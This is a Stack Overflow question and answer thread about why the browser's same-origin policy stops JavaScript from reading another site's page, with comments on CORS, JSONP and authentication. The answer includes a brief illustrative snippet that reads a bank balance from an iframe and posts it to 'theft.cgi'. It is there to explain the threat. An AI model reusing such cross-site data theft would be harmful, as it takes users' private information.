1

I wanted to scrape pages client-side not server-side. However the same-origin policy prevents me from doing this.

What I'm trying to understand is why I don't have read only access to the DOM of another site.

What security risk does this pose to the site, if I can get the same information by pulling the page onto the server and accessing it any ways.

I simply want to pull basic information from a page like:

document.title

If I can do this serve side, why not client side? The main difference being the extra round-trip that I don't want to pay for?

Obviously user's data should not be accessible, and this is obvious and I don't need information on this. But in the same way I can pull in a generic version of a page using

file_get_contents

and parse the DOM, I would like to do client - side.

What is the technical limitation not allowing JavaScript to determine the difference between...giving access to user defined data vs. generic page data?

PHP can do it.

Why can't JavaScript?

What it the limitation?

I don't want to necessarily circumvent it or hack it, but understand the purposed better and maybe find that it does not apply to the case I have...page scrapes client side

Related

Ways to circumvent the same-origin policy

Same origin policy

How are bookmarklets( javascript in a link ) verfied by servers? How is security kept?

http://en.wikipedia.org/wiki/Representational_state_transfer#Central_principle

Community
  • 1
  • 1
  • Hiro, please, please, *please*, **please** watch the spelling of tags. I keep having to point this out to you. :p – Charles Sep 07 '12 at 17:31

1 Answers1

1

why I don't have read only access to the DOM of another site

The data that your user can access on any given site may not be the same as the data you can access on that site.

Since users might be identified by all sorts of things, including IP address, there is no way for the browser to sanitize the data of all personal information.

Overly simplistic illustration:

<iframe src="your bank" id="frame"></iframe>
<script>
    var bank = document.getElementById('frame').contentDocument;
    var stolen = bank.getElementById('account_balance').innerText;
    ajax('theft.cgi', stolen);
Quentin
  • 914,110
  • 126
  • 1,211
  • 1,335
  • But why can't .js Pull in a non-user authenticated page...i.e. one with no user data? –  Sep 07 '12 at 13:12
  • @HiroProtagonist — The request is coming from the user's browser. How is the server supposed to know not to send them the authenticated page? – Quentin Sep 07 '12 at 13:12
  • `Obviously user's data should not be accessible, and this is obvious and I don't need information on this.` –  Sep 07 '12 at 13:12
  • Server responds to Client request....it does what client tells it to do....REST principle maybe...I dunno. –  Sep 07 '12 at 13:13
  • @HiroProtagonist — How is the client supposed to tell the server not to send the authenticated page? – Quentin Sep 07 '12 at 13:14
  • you tell me...it's my question and your answer...:) –  Sep 07 '12 at 13:15
  • @HiroProtagonist — It can't. That's why you can't do what you want. – Quentin Sep 07 '12 at 13:17
  • This is perhaps a design inconsistency with .js...if php can do it .js should be able to as well....JavaScript Global object - `fileGetGeneric()` or something....if you have any info. on how the language is designed I would like to read...ES5 is more the interface I think. –  Sep 07 '12 at 13:24
  • PHP runs on the server. JavaScript runs on the client. If the authentication system is "User has an IP address on the office LAN therefore they get access to more of the wiki", there is no way that something on the client could give different authentication information (the IP address) to normal. The server, which is under the control of a third party who isn't inside the office, would have a different IP and wouldn't be authenticated. PHP running on a server inside the office would also get the authenticated version as it would have an internal IP address. – Quentin Sep 07 '12 at 13:26
  • This isn't PHP Vs. JavaScript. This is "The user's browser" vs "The website's server". – Quentin Sep 07 '12 at 13:27
  • Coffee makes me think...why not just ajax the page in and then either parse it directly or add it to the DOM using .innerHTML...this would pretty much do what I need....Client can hit the server with what ever it wants with Ajax....just make a GET request directly...authentication information does not have to be part of the client-server communications....is is stored in a cookie or localStorage as a hash...just don't send it....now you are anonymous or not logged in. –  Sep 07 '12 at 16:19
  • Ajax means "Making HTTP requests without leaving the page". That will be subject to the same origin policy. – Quentin Sep 07 '12 at 16:20
  • "authentication information does not have to be part of the client-server communications" — The browser has no way of knowing what data is authentication information and what is not, some potential information cannot be removed from the require (e.g. the source IP address in the earlier example). **It cannot be separated**. – Quentin Sep 07 '12 at 16:21
  • Are you saying I can't make an Ajax request to a file on say twitter.com?.....I just want to verify. –  Sep 07 '12 at 16:21
  • You can make an Ajax request. You can't read the response unless you are granted permission with CORS or the same origin policy is circumvented by JSONP. – Quentin Sep 07 '12 at 16:22
  • but I can pull favicons from any server I want with nothing advanced....some how .js (in broswer ) knows the difference between images and files when I do an Ajax GET...are you certain on this? –  Sep 07 '12 at 16:23
  • Displaying content from other origins to the user has always been possible. You can't read it with JS. If you fetched a favicon via XHR from a different origin then you wouldn't be able to read the data. – Quentin Sep 07 '12 at 16:29